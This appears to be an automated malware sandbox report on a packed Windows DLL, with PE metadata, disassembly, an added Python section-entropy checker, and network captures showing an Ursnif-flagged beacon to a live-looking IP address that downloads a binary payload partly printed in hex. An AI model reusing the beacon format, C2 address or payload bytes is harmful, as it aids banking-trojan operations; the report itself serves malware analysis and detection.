                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.2386475978649285
                      TrID:
                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                      • Generic Win/DOS Executable (2004/3) 0.20%
                      • DOS Executable Generic (2002/1) 0.20%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:xaj0e933Uv.dll
                      File size:442368
                      MD5:69e570a35f63ea12cbad7a10b25a6ea4
                      SHA1:f0ca60563eeb9098ad6133daa1fc48c3987437e2
                      SHA256:3362915be3f3ed1572f4ba757d155608f54a460fd935bfe3f37138cf0fe383b6
                      SHA512:85658f8418f40fa9f24934b26aa45550dd8fb34425d0af342511b4e64975614071535e99257497f69db25fa87a5cde271bc4a6e1a0971a287f7f2d497d2374ca
                      SSDEEP:6144:rxpWDRyexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:rxpuFlJqYhiVDwGU8OqaX1WW3zNg7
                      TLSH:D494F14977A11DBBEC0807761CF8C52B9B66BE2CA23A70DEA6683CFF7E175511048706
                      File Content Preview:MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5......
                      Icon Hash:9068eccc64f6e2ad
                      Entrypoint:0x401430
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x411096D1 [Wed Aug 4 07:57:05 2004 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:0
                      File Version Major:5
                      File Version Minor:0
                      Subsystem Version Major:5
                      Subsystem Version Minor:0
                      Import Hash:0bedc9af0ed7cf2ba33cf662a24d448e
                      Instruction
                      push ebp
                      mov ebp, esp
                      add ecx, FFFFFFFFh
                      call 00007F4F08B3F6FCh
                      pop eax
                      pop eax
                      mov dword ptr [00414544h], eax
                      mov edx, dword ptr [00414660h]
                      sub edx, 00005289h
                      call edx
                      ret
                      int3
                      push esi
                      mov eax, ebx
                      mov dword ptr [00414540h], eax
                      pop dword ptr [00414538h]
                      mov dword ptr [00414548h], ebp
                      mov dword ptr [0041453Ch], edi
                      sub dword ptr [00414548h], FFFFFFFCh
                      loop 00007F4F08B3F6A5h
                      mov dword ptr [ebp+00h], eax
                      nop
                      ret
                      lea ecx, ebx
                      pop es
                      mov ds, word ptr [ecx]
                      lodsb
                      lea ebp, dword ptr [ecx+6B2EEEC3h]
                      movsb
                      xchg eax, esi
                      xchg dword ptr [ebx], esp
                      shl byte ptr [C2100869h], 1
                      loopne 00007F4F08B3F698h
                      pop eax
                      or ecx, dword ptr [ebx-5F28A8CFh]
                      pop ebx
                      je 00007F4F08B3F716h
                      sbb dword ptr [esi], eax
                      sbb bh, dh
                      mov ebp, A52AB60Ah
                      xor al, F7h
                      sbb eax, 442A8BDAh
                      mov edx, 8289DCF1h
                      wait
                      sub byte ptr [eax-20h], dh
                      pop ecx
                      or esi, edi
                      xchg eax, esp
                      loop 00007F4F08B3F757h
                      xchg eax, edi
                      sti
                      cmp eax, 3B0AD66Fh
                      dec ebp
                      mov esp, E193F8C3h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdc18 | 0x8c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x9f28 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0xf0c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xd0b0 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0xb0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x1000 | 0x1 | .text
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb710 | 0xc000 | False | 0.0735880533854 | data | 1.02187881889 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0xd000 | 0x1073 | 0x2000 | False | 0.18017578125 | data | 3.71231531364 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xf000 | 0x79d0 | 0x6000 | False | 0.373657226562 | data | 6.02583875365 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.crt | 0x17000 | 0x1dc8e | 0x1e000 | False | 0.988427734375 | data | 7.9815287954 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.erloc | 0x35000 | 0x2ca4f | 0x2d000 | False | 0.988259548611 | data | 7.98122243943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x62000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51663069246 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6c000 | 0x132e | 0x2000 | False | 0.219360351562 | data | 3.73577949218 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
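The section table is the quickest static tell here: `.crt` and `.erloc` (a near-miss of `.reloc`) are writable, non-standard sections at entropy 7.98 that together hold about 300 KB of the 432 KB file, while `.text` sits at entropy 1.02, so the visible code is a thin unpacking stub and the real payload is in those two blobs. The following is an added example, not part of the sandbox report, that reproduces the check with a hand-written section-table parser (no `pefile` dependency). `build_sample_pe()` constructs a two-section file in memory that mimics this layout so the block runs offline; the 7.0 entropy threshold and the list of "standard" section names are the author's choices, not the sandbox's.

```python
"""Per-section entropy and name check for a PE, parsed by hand (no pefile).

Added example, not part of the sandbox report. build_sample_pe() constructs a
two-section file in memory that mimics the layout above (a near-empty .text and
a writable, high-entropy section named .erloc), so the block runs offline. The
7.0 entropy threshold and the list of standard section names are the author's
choices, not the sandbox's.
"""
import math
import random
import struct
from collections import Counter

STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".bss", ".tls"}
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes):
    """Walk DOS header -> PE signature -> file header -> section table and yield
    (name, virtual_address, virtual_size, characteristics, raw_bytes)."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER follows the signature: NumberOfSections at +2, then
    # TimeDateStamp, PointerToSymbolTable, NumberOfSymbols (12 bytes skipped),
    # then SizeOfOptionalHeader.
    num_sections, size_opt = struct.unpack_from("<H12xH", pe, e_lfanew + 6)
    table = e_lfanew + 24 + size_opt
    for i in range(num_sections):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HDR, pe, table + 40 * i)
        yield (name.rstrip(b"\0").decode("ascii", "replace"), vaddr, vsize, chars,
               pe[rawptr:rawptr + rawsize])


def suspicious_sections(pe: bytes, threshold: float = 7.0):
    """Return [(name, entropy, reasons)] for sections a triager should open first."""
    flagged = []
    for name, _vaddr, _vsize, chars, data in parse_sections(pe):
        ent = shannon_entropy(data)
        reasons = []
        if ent >= threshold:
            reasons.append("high entropy (packed or encrypted payload)")
        if name not in STANDARD_SECTIONS:
            reasons.append("non-standard section name")
        if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
            reasons.append("writable and executable")
        if reasons:
            flagged.append((name, round(ent, 3), reasons))
    return flagged


def build_sample_pe() -> bytes:
    """Constructed PE: DOS stub, PE signature, file header, zeroed optional header,
    two section headers, then raw section data at file offset 0x200."""
    rng = random.Random(0x411096D1)  # deterministic; the seed is just the sample's timestamp
    text = b"\x55\x8b\xec" + b"\x00" * (0x1000 - 3)            # push ebp; mov ebp, esp; zeros
    blob = bytes(rng.getrandbits(8) for _ in range(0x2000))    # stands in for .erloc
    sections = [(b".text", 0x60000020, text), (b".erloc", 0xC0000040, blob)]
    e_lfanew, size_opt = 0x40, 0xE0
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0x411096D1, 0, 0, size_opt, 0x2102)
    opt_hdr = struct.pack("<H", 0x10B) + b"\0" * (size_opt - 2)  # PE32 magic; rest unused here
    hdrs, body, raw_ptr, vaddr = b"", b"", 0x200, 0x1000
    for name, chars, data in sections:
        hdrs += struct.pack(SECTION_HDR, name.ljust(8, b"\0"), len(data), vaddr, len(data),
                            raw_ptr, 0, 0, 0, 0, chars)
        body += data
        raw_ptr += len(data)
        vaddr += (len(data) + 0xFFF) & ~0xFFF
    return (dos + b"PE\0\0" + file_hdr + opt_hdr + hdrs).ljust(0x200, b"\0") + body


if __name__ == "__main__":
    for name, ent, reasons in suspicious_sections(build_sample_pe()):
        print(f"{name:8} entropy={ent:.3f}  {'; '.join(reasons)}")
```

Pointing `suspicious_sections(open(path, "rb").read())` at the real sample should list `.crt` and `.erloc` for both entropy and name; the two high-entropy blobs are where to start when dumping the unpacked stage from memory.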
Name | RVA | Size | Type | Language | Country
RT_BITMAP | 0x62360 | 0x666 | data | English | United States
RT_ICON | 0x629c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x67228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States
RT_ICON | 0x697d0 | 0xea8 | data | English | United States
RT_ICON | 0x6a678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x6af20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_DIALOG | 0x6b488 | 0xb4 | data | English | United States
RT_DIALOG | 0x6b540 | 0x120 | data | English | United States
RT_DIALOG | 0x6b660 | 0x158 | data | English | United States
RT_DIALOG | 0x6b7b8 | 0x202 | data | English | United States
RT_DIALOG | 0x6b9c0 | 0xf8 | data | English | United States
RT_DIALOG | 0x6bab8 | 0xa0 | data | English | United States
RT_DIALOG | 0x6bb58 | 0xee | data | English | United States
RT_GROUP_ICON | 0x6bc48 | 0x4c | data | English | United States
RT_VERSION | 0x6bc98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States
DLL | Import
KERNEL32.dll | EraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak
OLEAUT32.dll | GetRecordInfoFromTypeInfo, LoadTypeLibEx
USER32.dll | DefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo
GDI32.dll | ExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment
ADVAPI32.dll | EnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA
msvcrt.dll | strcoll, fgetwc, srand
Description | Data
LegalCopyright | A Company. All rights reserved.
InternalName |
FileVersion | 1.0.0.0
CompanyName | A Company
ProductName |
ProductVersion | 1.0.0.0
FileDescription |
OriginalFilename | myfile.exe
Translation | 0x0409 0x04b0
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/04/22-16:27:54.122082 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49769 | 80 | 192.168.2.4 | 185.189.151.28
05/04/22-16:27:53.231327 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49769 | 80 | 192.168.2.4 | 185.189.151.28
05/04/22-16:27:53.642851 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49769 | 80 | 192.168.2.4 | 185.189.151.28
05/04/22-16:27:33.120656 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49760 | 80 | 192.168.2.4 | 13.107.43.16
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2022 16:27:53.212703943 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.229989052 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.230151892 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.231327057 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.248414040 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.534866095 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.534919977 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.534966946 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.534984112 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.535002947 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.535007954 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.535043955 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.535058022 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.535069942 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.535089970 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.535105944 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.535140991 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.535150051 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.535165071 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.535206079 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.535248995 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.535300016 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.535312891 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.535350084 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.535361052 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.535375118 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.535397053 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.535409927 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.535456896 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.552704096 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.552772999 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.552818060 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.552848101 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.552889109 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.552930117 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.552931070 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.552967072 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.552967072 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553004980 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.553009033 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553046942 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553076029 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553114891 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553153992 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553158045 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.553183079 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553217888 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.553225994 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553267956 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553271055 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.553298950 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553302050 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.553318024 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.553338051 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553379059 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553400993 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.553409100 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553436041 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.553447008 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553486109 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553498030 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.553514004 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553534031 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.553555965 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553599119 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553606033 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.553649902 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.553690910 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553807020 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553848982 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553863049 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.553879023 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.553915977 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.554440975 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.554519892 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.570719004 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.570779085 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.570816994 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.570862055 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.570903063 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.570933104 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.570971012 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.571021080 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.571029902 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.571050882 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.571090937 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.571101904 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.571151018 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.571155071 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.571188927 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.571219921 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.571260929 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.571269035 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.571300030 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.571307898 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.571341038 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.571369886 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.571386099 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:27:53.571408033 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:27:53.571448088 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 4, 2022 16:27:33.081885099 CEST | 8.8.8.8 | 192.168.2.4 | 0xd133 | No error (0) | l-0007.l-dc-msedge.net | | 13.107.43.16 | A (IP address) | IN (0x0001)
                      • 185.189.151.28
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49769 | 185.189.151.28 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2022 16:27:53.231327057 CEST | 1212 | OUT | GET /drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 185.189.151.28
                      Connection: Keep-Alive
                      Cache-Control: no-cache
May 4, 2022 16:27:53.534866095 CEST | 1213 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Wed, 04 May 2022 14:27:53 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 186001
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="62728d697bd35.bin"
                      Data Raw: 90 fe 16 00 dd 20 a6 90 00 22 81 96 31 0c 06 ee 2c a0 48 f2 36 47 2b a8 1f 78 fb 84 fe 80 bc 68 83 a3 b0 1b 36 53 4b 75 0f a7 82 72 a1 41 e1 ff 47 06 9d 2a 90 8e 26 f8 83 6e 4c 7a ba 23 11 cb 7a c4 b5 76 5c eb 93 5b 14 3c c9 98 a5 e3 8b c6 36 cc 13 99 54 83 1a 4c 7b 46 49 91 17 ea 3b bb 0c 41 7e bf 1b 94 ad a3 32 05 aa 3b b0 4f 0c cb fc da 60 91 e2 bd 0d 03 9d 3c bd a2 dd d7 3f 0f 94 dc e3 06 b6 33 92 7e 82 88 84 01 f1 a2 02 d5 be cd 05 f8 80 06 a7 6e 5b 13 39 e7 33 43 f9 ee 65 41 c1 09 48 5c 39 3b 96 45 42 2c d6 0e 26 1b 0d 07 a7 4a 31 10 18 b4 36 c2 cb 88 ce 0e 68 30 dd c9 12 ff 5a 51 b6 1f 27 30 1a 25 a6 fb 5f b1 43 86 48 4a be 41 1d 15 20 30 a1 22 5a 46 58 f9 15 cc 69 9f 79 f8 78 b2 f1 f4 64 27 68 96 aa c1 73 d4 a7 58 3d ff ca 94 06 f9 ff 3e aa d1 00 6e c4 9d 6b 43 ac 0c 73 10 7f 0a 46 6d a9 74 29 b7 65 25 b5 77 93 76 25 7a b8 d9 0d 9c 83 ab 02 b1 78 eb 7b 8d 01 61 4d 6f 2e 0a da b3 c7 26 36 df 2a 95 d4 bf df d3 28 b1 c4 44 91 f7 ed 03 59 40 3e 4e f4 f3 2c 45 08 6c ca 1e 96 ba cc 33 c6 d6 79 6e fe fc 1f 27 b2 8a 2c 3c 8b e3 b4 14 90 a6 c2 99 62 62 09 88 68 9b e5 5d 5a 1b 90 23 e3 3f 1e 37 65 79 84 54 e6 fa 2d 39 d0 ab 72 5f 30 51 17 b6 8d 50 6c f0 28 5a 7e 77 5d 4f e7 c7 d6 f5 10 1c e5 da 36 7b 84 8e 94 d4 b7 df fa ab aa 17 53 ac e3 5b b0 72 c2 c8 65 0a a1 68 34 7f bd db 5d 00 76 de 42 e5 35 53 61 1f b2 46 e4 5d b5 7e a8 1e 4b 28 b7 9d 61 42 3c ec 8f ef c7 31 1c 8f 4c 68 8c 93 db e0 4b 86 ff 36 5e 8b e5 b6 46 f3 43 2c c5 92 03 de c3 8a 33 76 52 de 17 e1 6a 06 82 43 9b 7d 58 a6 f9 59 d0 35 f8 22 ec 02 92 5f c2 94 98 f9 9c 96 72 7e 76 47 66 f2 a7 7b 29 58 64 8a b4 df fe fc 78 4c 1b 45 88 71 86 ab 44 26 65 5b 29 85 31 04 6f 88 9a 15 b6 69 e2 90 95 32 fe 62 fe a0 0f 8f 8d 27 8d d0 63 31 96 18 ad c3 68 6d 1c 70 e8 65 66 f8 3d 34 d6 fb 93 0e 68 95 ae 3f 77 85 3e f6 c2 fd bd a3 12 e3 f3 a6 45 7e 74 c5 8b 22 2b 46 9f b3 fb 84 39 cc c4 6e 5f 09 3e cf c2 0b 7a d8 1a a2 f7 8f d2 7c c9 c7 0a 86 fa 2f c2 c4 67 c1 14 c1 36 f4 7e ca 10 53 88 8f 
